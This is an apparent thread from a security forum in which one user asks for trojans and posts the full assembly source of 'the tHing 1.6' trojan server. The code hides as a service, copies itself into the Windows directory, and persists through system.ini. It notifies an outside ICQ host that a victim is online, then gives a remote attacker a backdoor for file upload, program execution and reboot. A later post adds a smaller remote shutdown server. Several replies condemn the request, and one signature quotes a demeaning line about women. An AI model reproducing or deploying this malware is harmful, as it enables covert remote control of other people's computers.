
Thread: "The Thing" like Trojans

  1. #1

    Question "The Thing" like Trojans

    "The thing" — a nice trojan (6 KB) with ICQ notify and download-and-execute-another-application properties. It can also be embedded in an HTML file with hex encoding (godmessage).

    Are there any Assembly-coded trojans out there? Also, does anyone use "the thing" on XP or 2K?

  2. #2
    searching for trojan horses---------------------->go to hell

  3. #3
    I'm already there!

  4. #4
    If I thought you were using this info for security purposes, I'd help, but the way you speak so highly of this trojan suggests to me that's not your intention. This is not a skiddy site, it's a security site. If you'd like to learn something, by all means stick around, but if you want to deface web sites and put bugs in people's computers, I'd suggest getting in the shower and practicing keeping a good grip on the soap, because you'll probably need that knowledge soon.
    [shadow]I don't believe in anarchy. If you're not smart enough to beat the system it's your problem.[/shadow]


  5. #5
    I'm not a kiddy anyway. Give me the percentage of visitors that know Assembly, C++ and VBScript: 1%, 5%, max 10%. Also, most of the visitors use this information to spy on their girlfriends' email accounts. So don't **** my mind with "use this information for educational purposes only blah blah blah...". I asked for the trojan to monitor its file activity. "Analyzing examples" is a basic step of software engineering, remember?


    ; the tHing 1.6 server

    .486P
    Locals
    jumps

    .Model Flat ,StdCall

    SOCKET_ERROR equ -1

    WSAdata STRUCT
    wVersion WORD ?
    wHighVersion WORD ?
    szDescription BYTE ?
    szSystemStatus BYTE ?
    iMaxSockets WORD ?
    iMaxUdpDg WORD ?
    lpVendorInfo DWORD ?
    WSAdata ENDS

    sockaddr_in STRUCT
    sin_family WORD 0
    sin_port WORD 0
    sin_addr DWORD 0
    sin_zero BYTE 8 dup (0)
    sockaddr_in ENDS

    INADDR_ANY equ 000000000h
    AF_INET equ 2
    max_size equ 1024


    mb_ok equ 0 ;mb_ok gets the value "0"
    hWnd equ 0
    lpText equ offset text ;set a pointer to the text
    lpCaption equ offset caption ;set a pointer to the caption


    ; declaration of all used API-functions
    extrn WSAStartup : proc
    extrn WSACleanup : proc
    extrn WSAGetLastError : proc
    extrn htons : proc
    extrn bind : proc
    extrn socket : proc
    extrn listen : proc
    extrn accept : proc
    extrn connect : proc
    extrn inet_addr : proc
    extrn send : proc
    extrn recv : proc
    extrn closesocket : proc
    extrn gethostname : proc
    extrn gethostbyname : proc
    extrn inet_ntoa : proc
    extrn Sleep : proc


    extrn ExitProcess : PROC ;procedure to shut down a process
    extrn MessageBoxA : PROC ;procedure to show a MessageBox
    extrn GetModuleHandleA : PROC
    extrn GetProcAddress : PROC
    extrn GetCurrentProcessId : PROC
    extrn ExitWindowsEx : proc
    extrn ShellExecuteA : proc
    extrn GetWindowsDirectoryA : proc
    extrn lstrcmp : proc
    extrn lstrlen : proc
    extrn lstrcat : proc
    extrn lstrcpy : proc
    extrn CreateFileA : proc
    extrn OpenFile : proc
    ;extrn ReadFile : proc
    extrn WriteFile : proc
    extrn CloseHandle : proc
    extrn GetCommandLineA : proc
    extrn CopyFileA : proc
    extrn GetLastError : proc
    extrn GetUserNameA : proc
    extrn MessageBeep : proc
    extrn WritePrivateProfileStringA: proc

    ; here begins our Data

    .Data

    wsa WSADATA ?

    sa dw AF_INET ; Family
    sockport db 0,0 ; TCP Port
    sockip db 0,0,0,0 ; IP Address
    db 8 dup(0) ; zero stuff.


    xsysini db 'explorer.exe ',0
    xsys db 'system.ini',0
    xboot db 'boot',0
    xshell db 'shell',0
    xsysadd db '\',0


    newpath db 100 dup (0)
    exename db 100 dup (0)


    ;// icq

    icqp db '205.188.147.55',0
    db 10 dup(0)
    portis db '+,+Port+:+',0
    passis db '+,+Password+:+',0

    xport db '00000',0
    to db '&to=',0
    endicq db ' HTTP/1.0',0
    eol db 13,10,13,10,13,10,0

    sysname db 'netlog.exe',0
    db 5 dup (0)
    icq db '29839368',0
    db 5 dup (0)
    passw db 'fc',0
    db 10 dup (0)
    nick db 'slave',0
    db 10 dup (0)

    port dd 6000
    conn_socket dd 0
    data_socket dd 0
    server sockaddr_in <0,0,0,0>
    client sockaddr_in ?
    text2 db 30 dup (0)
    saddrlen dw 16
    db 16 dup (0)

    buff db 1030 dup (0)

    starticq db 'GET /scripts/WWPMsg.dll?from=Blade&fromemail=',0
    nexticq db '&subject=+tHe+tHing+1.6&body=Victim+is+ONLINE+',0

    h1 dd 0
    h2 dd 0
    packets dd 0
    packet dd 0
    pas db 0
    f dd 0
    i dd 0
    how dd 0

    text db "Cannot initialize socket.",0 ; error
    mesaj db "the tHing 1.6 server.",0
    _spawn db "spawned.",0
    _kill db "server killed.",0
    _disc db "disconnected.",0
    _upload db "uploaded.",0
    _write db '.',0
    invalid db 'invalid password.',0
    _ok db 'password accepted.',0
    sysini2 db 'explorer.exe ',0
    myip db '127.0.0.1',0

    caption db "Error",0 ;Captionstring, 0-terminated

    Kernel32 db "Kernel32.dll",0
    RSP db "RegisterServiceProcess",0

    icqip db '205.188.147.55',0
    db 10 dup(0)

    .Code


    Main:

    push offset Kernel32
    call GetModuleHandleA ; get the handle of kernel32.dll
    push offset RSP
    push eax
    call GetProcAddress ; get the address of the function
    mov ebx, eax ; save the pointer into ebx
    call GetCurrentProcessId ; get the current process's id
    push 1 ; 1 = Register as Service
    push eax ; process id
    call ebx ; call RegisterServiceProcess


    call GetCommandLineA ; get parameters (exe name)
    mov esi,eax
    inc esi


    mov edi,offset exename
    conv:
    mov al,byte ptr [esi]
    cmp al,22h
    jz terminat
    mov byte ptr [edi],al

    inc esi
    inc edi
    jmp conv

    terminat:

    ; // moving part

    call GetWindowsDirectoryA,offset newpath,100
    call lstrcat,offset newpath,offset sysadd
    call lstrcat,offset newpath,offset sysname

    call CopyFileA,offset exename,offset newpath,0

    call lstrcpy,offset buff,offset sysini
    call lstrcat,offset buff,offset sysname
    call WritePrivateProfileStringA,offset boot,offset shell,offset buff,offset sys


    try_again:mov pas,0

    call WSAStartup,202h,offset wsa
    cmp eax,SOCKET_ERROR
    jnz gata

    error:

    call closesocket,conn_socket
    call closesocket,data_socket
    call WSAcleanup
    call Sleep,300
    jmp try_again



    gata:
    ; // icq notification

    call socket, 2, 1, 0
    cmp eax,-1
    jz error


    mov conn_socket,eax

    mov cx,200
    mov edi,offset buff
    iary: dec cx
    inc edi
    mov byte ptr [edi],0
    cmp cx,0
    jnz iary

    call htons,80

    mov [server.sin_family],AF_INET
    mov [server.sin_port],ax

    call inet_addr,offset icqip
    cmp eax,-1
    jz error
    mov [server.sin_addr],eax

    call connect,conn_socket,offset server,16
    cmp eax,-1
    jz error

    mov byte ptr buff,0

    call lstrcpy,offset buff,offset starticq
    call lstrcat,offset buff,offset xnick
    call lstrcat,offset buff,offset nexticq
    call lstrcat,offset buff,offset passis
    call lstrcat,offset buff,offset passw
    call lstrcat,offset buff,offset portis
    call lstrcat,offset buff,offset xport
    ;// Call GetUserNameA,offset username,50
    ;// call lstrcat,offset buff,offset useris


    call lstrcat,offset buff,offset to
    call lstrcat,offset buff,offset icq
    call lstrcat,offset buff,offset endicq


    call lstrcat,offset buff,offset eol

    call lstrlen,offset buff
    call send,conn_socket,offset buff,eax,0
    cmp eax,-1
    jz error

    call closesocket,conn_socket


    ; end of ICQ


    start_listen:
    ; // start of server listen

    call socket, 2, 1, 0

    cmp eax,0
    jb error
    mov conn_socket,eax


    call htons,6000

    mov [server.sin_family],AF_INET
    mov [server.sin_port],ax
    mov [server.sin_addr],0


    call bind, conn_socket, offset server, 16
    cmp eax,-1
    jz error

    push 5
    push conn_socket
    call listen
    cmp eax,-1
    jz error
    mov data_socket,0

    again:
    mov byte ptr buff,0
    cmp data_socket,0
    jnz after


    call accept,conn_socket,offset client,offset saddrlen
    cmp eax,-1
    jz error
    mov data_socket,eax
    mov pas,0

    call send,data_socket,offset mesaj,22,0
    cmp eax,-1
    jz error

    mov cx,12
    mov edi,offset buff
    iarx: dec cx
    inc edi
    mov byte ptr [edi],0
    cmp cx,0
    jnz iarx

    call recv,data_socket,offset buff,12,0
    cmp eax,-1
    jz error

    call lstrcmp,offset buff,offset passw
    cmp eax,0
    jz ok

    call send,data_socket,offset invalid,17,0
    cmp eax,-1
    jz error
    mov data_socket,0

    jmp again

    ok: call send,data_socket,offset _ok,18,0
    after: cmp pas,0
    jnz upload_2

    mov cx,200
    mov edi,offset buff
    iar: dec cx
    inc edi
    mov byte ptr [edi],0
    cmp cx,0
    jnz iar

    call recv,data_socket,offset buff,200,0
    cmp eax,-1
    jz error

    mov al,byte ptr buff

    ; QUIT (kill server)

    cmp al,'Q'
    jz quit

    ; Reboot the computer

    cmp al,'R'
    jz Reboot

    ; Spawn program

    cmp al,'S'
    jz Spawn


    ; Get Windows Directory

    cmp al,'W'
    jz WinDir

    ; Upload File (expect U;filename;fsize)
    cmp al,'U'
    jz Upload

    ; Disconnect
    cmp al,'D'
    jz disconnect


    jmp again

    Disconnect:
    call send,data_socket,offset _disc,14,0
    cmp eax,-1
    jz error
    call closesocket,data_socket

    mov data_socket,0
    jmp again


    Upload_2:

    mov eax,packet
    cmp eax,packets
    jl read
    jmp close_file
    read:
    call recv,data_socket,offset buff,max_size,0
    cmp eax,-1
    jz error

    mov how,eax
    add packet,eax

    call WriteFile,f,offset buff, how, offset i,0
    cmp eax,-1
    jz error

    call send,data_socket,offset _write,1,0
    cmp eax,-1
    jz error

    jmp again

    close_file:
    mov pas,0
    mov packets,0

    call send,data_socket,offset _upload,9,0
    cmp eax,-1
    jz error
    call CloseHandle,f

    jmp again

    Upload:
    mov edi,offset buff+2
    mov esi,edi
    here:
    cmp byte ptr [edi],';'
    jz _gata
    inc edi
    jmp here

    _gata: mov byte ptr [edi],0

    ; at this moment edi+1 = offset to filezise
    ; esi = offset to filename terminated in zero

    ; must convert filesize to integer

    push esi

    xor ecx,ecx
    inc edi
    call lstrlen,edi

    _again:
    xor edx,edx
    mov dl,byte ptr [edi]
    sub dl,"0" ; subtrack each digit with "0" to convert it to hex value
    mov esi,eax
    dec esi
    push eax
    mov eax,edx
    push ebx
    mov ebx,10

    _iar:cmp esi,0
    jbe __gata

    mul ebx
    dec esi


    jmp _iar
    __gata:
    pop ebx
    add ecx,eax
    pop eax
    inc edi
    dec eax
    cmp eax,0
    jnz _again




    mov eax,ecx ; converted (ax contains fsize)


    mov packet,0
    mov packets,eax

    mov pas,1

    pop esi


    call CreateFileA,esi,40000000h,1,0,2,20h,0

    mov f,eax
    jmp again


    WinDir:
    call GetWindowsDirectoryA,offset buff,100

    mov edi,offset buff
    mov al,0
    mov ecx,0FFFFFFFFh
    repne scasb
    sub ecx,0FFFFFFFFh
    neg ecx
    dec ecx
    mov eax,ecx


    call send,data_socket,offset buff,eax,0
    cmp eax,-1
    jz error
    jmp again


    Spawn:
    call ShellExecuteA,0,0,offset buff+2,0,0,0
    mov byte ptr buff,0
    cmp eax,32
    jl again
    call send,data_socket,offset _spawn,8,0
    cmp eax,-1
    jz error
    jmp again

    Reboot:
    call ExitWindowsEx,6,offset port
    quit: jmp next

    sysini db 'explorer.exe ',0
    sys db 'system.ini',0
    boot db 'boot',0
    shell db 'shell',0
    sysadd db '\',0
    xnick db 'neo',0
    db 10 dup (0)

    useris db ',+username+:+'
    username db 50 dup (0)



    next:
    call WritePrivateProfileStringA,offset boot,offset shell,offset sysini2,offset sys

    call send,data_socket,offset _kill,15,0
    call closesocket,data_socket
    call closesocket,conn_socket
    call ExitProcess

    End Main ;End of code, Main is the entrypoint

  6. #6
    I'd actually say 10%+. There's a very high number of professionals (network, security, programming, and so on) on this site compared to most "security" sites. Even the people who aren't into computers as a profession are still intelligent and trying to learn without going the illegal route. So, I'll give you the "for educational purposes only blah blah blah." That's what this site's here for: EDUCATION on how to stop people from putting crap like that on their computer.

    I'm sure some people in here do use the info to spy on their girlfriends' email accounts, but most people in here try not to contribute to it if they can help it. Since there's no way to read someone's intentions without them telling you, all we can do is try.
    [shadow]I don't believe in anarchy. If you're not smart enough to beat the system it's your problem.[/shadow]


  7. #7
    Grow up and don't waste our time trying to get trojan info so you can hack into other people's PCs.
    I love pizza...........Do you?

  8. #8
    The attachment is a cool tutorial about trojans (how they work, how to remove them, how they auto-start, and so on). I thought it might be useful for those who read this thread!

    By the way, Utreise, negging me won't get ya anywhere, brah.
    Read the FAQ (trojans are considered lammmmmmmmmme).
    -----------------------------------------------------------------------------------------------------------------------

  9. #9
    If you are a smart person, which I really doubt, I would not post anything that has to do with finding a way to harm other people's computers. Like everybody has been telling you, this is a security site, not a skiddy site. We all may disagree with what somebody says sometimes, but in the end we get together to learn and teach each other. If you are going to come in here thinking that we will use our knowledge to help you harm an innocent person, well my friend, you have a lot of re-thinking to do.

  10. #10
    ***************
    Give me the percentage of visitors that knows Assembly, C++ and Vbscript, %1, %5 max %10
    ***************

    Utreise, this isn't a flame. I'm following this thread to see if I can learn anything from it myself, but nobody knows you. You ask how many people here know anything, but just how much do you know? If you know anything at all, then you know 99% are full of ****. I don't 'think' you are, but I don't know that.

    really, does posting code really say anything?

    .386
    .model flat,stdcall
    option casemap:none

    CreateSocket PROTO :DWORD

    inv equ invoke

    include \masm32\include\windows.inc
    include \masm32\include\kernel32.inc
    include \masm32\include\user32.inc
    include \masm32\include\shell32.inc
    include \masm32\include\wsock32.inc
    includelib \masm32\lib\kernel32.lib
    includelib \masm32\lib\user32.lib
    includelib \masm32\lib\shell32.lib
    includelib \masm32\lib\wsock32.lib

    .const

    X_Win equ 160
    Y_Win equ 090
    port equ 25
    WM_SOCKET equ WM_USER+100
    ICON equ 1

    RESTART equ 0
    SHUTDOWN equ 1
    SYSLOCKUP equ 2

    .data

    szShutdown db "Shutdown", 0
    szRestart db "Restart", 0
    szDunno db "I don't know this msg", 0

    ClassName db "Win32ASM_Class", 0
    AppName db "Server", 0

    wc WNDCLASSEX <SIZEOF WNDCLASSEX, CS_HREDRAW or CS_VREDRAW, offset WndProc, \
    NULL, NULL, NULL, NULL, NULL, COLOR_WINDOW + 1, NULL, \
    offset ClassName, NULL>

    szConnect db "Connection esthablished", 0
    e**** db "Something went wrong!", 0

    .data?

    hInstance dd ?
    hwnd dd ?
    X_Pos dd ?
    Y_Pos dd ?
    msg MSG <?>
    sin sockaddr_in <?>
    sSocket dd ?
    wsadata WSADATA <?>
    bRead dd ?
    available_data dd ?
    cSocket dd ?

    .code
    start:
    inv GetModuleHandle, NULL
    mov hInstance, eax
    mov wc.hInstance, eax
    inv LoadIcon, hInstance, ICON
    mov wc.hIcon, eax
    mov wc.hIconSm, eax
    inv LoadCursor, NULL, IDC_ARROW
    mov wc.hCursor, eax
    inv RegisterClassEx, offset wc
    inv GetSystemMetrics,SM_CXSCREEN ; Calculate Screen center
    shr eax, 1
    sub eax, X_Win / 2
    mov X_Pos, eax
    inv GetSystemMetrics,SM_CYSCREEN
    shr eax, 1
    sub eax, Y_Win / 2
    mov Y_Pos, eax
    inv CreateWindowEx, NULL, offset ClassName, offset AppName, WS_OVERLAPPEDWINDOW, \
    X_Pos, Y_Pos, X_Win, Y_Win, NULL, NULL, hInstance, NULL
    mov hwnd, eax
    inv ShowWindow, eax, SW_SHOW
    inv UpdateWindow, hwnd

    .while TRUE
    inv GetMessage, offset msg, NULL, 0, 0
    .break .if (!eax)
    inv TranslateMessage, offset msg
    inv DispatchMessage, offset msg
    .endw

    inv ExitProcess, msg.wParam

    ; Window Proc
    WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
    .if uMsg == WM_DESTROY
    inv closesocket, sSocket
    inv WSACleanup
    inv PostQuitMessage, NULL

    .elseif uMsg == WM_CREATE
    inv WSAStartup, 101h, offset wsadata
    inv CreateSocket, hWnd

    .elseif uMsg == WM_SOCKET
    mov eax, wParam
    mov cSocket, eax
    mov eax, lParam

    .if ax == FD_ACCEPT
    inv accept, sSocket, 0, 0

    .elseif ax == FD_READ
    inv ioctlsocket, cSocket, FIONREAD, offset available_data
    .if eax == NULL
    inv GlobalAlloc, GMEM_FIXED + GMEM_ZEROINIT, available_data
    mov bRead, eax
    inv recv, cSocket, bRead, available_data, 0
    mov available_data, eax
    ; inv MessageBox, hWnd, bRead, bRead, MB_OK
    mov esi, bRead
    cld
    lodsb

    .if al == RESTART
    inv ExitWindowsEx, EWX_REBOOT, 0
    .elseif al == SHUTDOWN
    inv ExitWindowsEx, EWX_SHUTDOWN, 0
    .else
    inv MessageBox, hWnd, offset szDunno, offset AppName, MB_OK
    .endif

    inv GlobalFree, bRead
    .else
    inv MessageBox, hWnd, offset e****, offset e****, MB_OK
    .endif
    .endif

    .else
    inv DefWindowProc, hWnd, uMsg, wParam, lParam
    ret
    .endif

    xor eax,eax
    ret
    WndProc endp

    CreateSocket proc hWnd:DWORD
    mov sin.sin_family, AF_INET
    inv htons, port
    mov sin.sin_port, ax
    inv socket, PF_INET, SOCK_STREAM, 0
    mov sSocket, eax
    inv WSAAsyncSelect, sSocket, hWnd, WM_SOCKET, FD_ACCEPT + FD_CLOSE + FD_READ
    inv bind, sSocket, offset sin, SIZEOF sin
    inv listen, sSocket, 2
    ret
    CreateSocket endp

    end start
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
